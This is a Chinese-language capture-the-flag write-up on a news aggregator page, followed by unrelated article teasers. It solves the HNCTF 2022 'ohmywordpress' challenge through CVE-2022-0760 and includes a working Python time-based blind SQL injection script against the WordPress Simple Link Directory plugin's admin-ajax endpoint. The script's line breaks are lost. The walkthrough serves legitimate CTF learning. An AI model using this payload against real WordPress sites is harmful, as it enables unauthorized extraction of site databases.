NSS [HNCTF 2022 WEEK2]ohmywordpress(CVE-2022-0760)

news/2024/10/24 6:37:39/

NSS [HNCTF 2022 WEEK2]ohmywordpress(CVE-2022-0760)

题目描述:flag在数据库里面。

开题:

image-20230917120720740

顺着按钮一直点下去会发现出现一个按钮叫安装WordPress

image-20230917120830513

安装完之后的界面,有一个搜索框。

image-20230917120947976

F12看看network。

又出现了这个WordPress,从源码中看出版本是6.0.2

image-20230917121044983

image-20230917123045968

网上一番搜索,找到一个cve,CVE-2022-0760。当WordPress的插件Simple Link Directory版本 < 7.7.2时候存在时间盲注。

查看源码,这里确实运用的这个插件,但是看不到版本。

image-20230917124319477

估计就是这个CVE,那就直接上盲注脚本。

import requests
import timeurl = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"result = ""
for i in range(1, 100):length = len(result)for o in range(32, 128):data = {"action": "qcopd_upvote_action",# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)","post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",}time1 = time.time()res = requests.post(url, data=data)time2 = time.time()# print(time2 - time1)# exit()if time2 - time1 > 3:result += chr(o)print(result)breakif len(result) == length:break

image-20230917125858415

为什么这样写脚本,漏洞利用在下面文章里面能找到。

image-20230917125035363

参考文章:

NSFOCUS绿盟科技

Simple Link Directory < 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)


http://www.ppmy.cn/news/1114586.html

相关文章

VictoriaMetrics时序数据库(TSDB)的使用

VictoriaMetrics时序数据库(TSDB)的使用

1&#xff1a;通过docker拉去镜像&#xff0c;设置挂载路径&#xff0c;设置数据保存天数&#xff0c;设置http数据接收端口&#xff0c;如下直接运行即可 docker run -d -p 4242:4242 -p 8428:8428 -v /opt/victoria:/victoria-metrics-data --name victoria victoriametric…
阅读更多...
【Python】Python 连接字符串应优先使用 join 而不是 +

【Python】Python 连接字符串应优先使用 join 而不是 +

Python 连接字符串应优先使用 join 而不是 简介 字符串处理在大多数编程程序语言中都不可避免&#xff0c;字符串的连接也是在编程过程中经常需要面对的问题。 Python中的字符串与其他一些程序语言如C、Java有一些不同&#xff0c;它为不 可变对象。 一旦创建便不能改变&…
阅读更多...
计算机网络篇之域名

计算机网络篇之域名

计算机网络篇之域名 介绍 一个域名是一个由点分割的字符串序列&#xff0c;用于标识一组IP地址或互联网上的计算机&#xff0c;域名用于在因特网上标识和定位特定的网站或服务 组成 域名由两个主要部分组成&#xff1a;顶级域和二级域&#xff0c;顶级域是域名的最高级别&a…
阅读更多...
Transactions on Multimedia 投稿经验分享

Transactions on Multimedia 投稿经验分享

关于IEEE Transactions on Multimedia 投稿经验分享 SCI分区 / JCR分区&#xff1a;Q1 / Q1 影响因子&#xff1a;7.3 期刊官方网站&#xff1a;IEEE Transactions on Multimedia | IEEE Xplore 投稿网址&#xff1a;https://mc.manuscriptcentral.com/tmm-ieee 2023.09.11 稿…
阅读更多...
Pandas一键爬取解析代理IP与代理IP池的维护

Pandas一键爬取解析代理IP与代理IP池的维护

一、前言 代理IP是现在爬虫获取数据的必备工具之一&#xff0c;它可以帮助我们规避一些反爬措施&#xff0c;比如封IP、验证码等。同时&#xff0c;我们也可以利用代理IP来实现一些多线程或分布式爬虫的功能&#xff0c;提高爬虫效率。但是&#xff0c;代理IP的获取和验证是一…
阅读更多...
论如何在Android中还原设计稿中的阴影

论如何在Android中还原设计稿中的阴影

每当设计稿上注明需要添加阴影时&#xff0c;Android上总是显得比较棘手&#xff0c;因为Android的阴影实现方式与Web和iOS有所区别。 一般来说阴影通常格式是有&#xff1a; X: 在X轴的偏移度 Y: 在Y轴偏移度 Blur: 阴影的模糊半径 Color: 阴影的颜色 何为阴影 但是在A…
阅读更多...
都在谈网关,Modbus网关到底是什么

都在谈网关,Modbus网关到底是什么

随着工业自动化的不断发展&#xff0c;各种协议和标准在行业中变得越来越重要。其中&#xff0c;Modbus协议是一种在工业自动化领域非常流行的通信协议&#xff0c;而Modbus网关是实现Modbus协议转换的关键设备。本文将介绍HiWoo Box&#xff0c;作为Modbus网关的应用和发展趋势…
阅读更多...
机器视觉之Basler工业相机使用和配置方法(C++)

机器视觉之Basler工业相机使用和配置方法(C++)

basler工业相机做双目视觉用&#xff0c;出现很多问题记录一下&#xff1a; 首先是多看手册&#xff1a;https://zh.docs.baslerweb.com/software 手册内有所有的源码和参考示例&#xff0c;实际上在使用过程中&#xff0c;大部分都是这些源码&#xff0c;具体项目选择对应的…
阅读更多...
最新文章

Copyright @ 2022~2023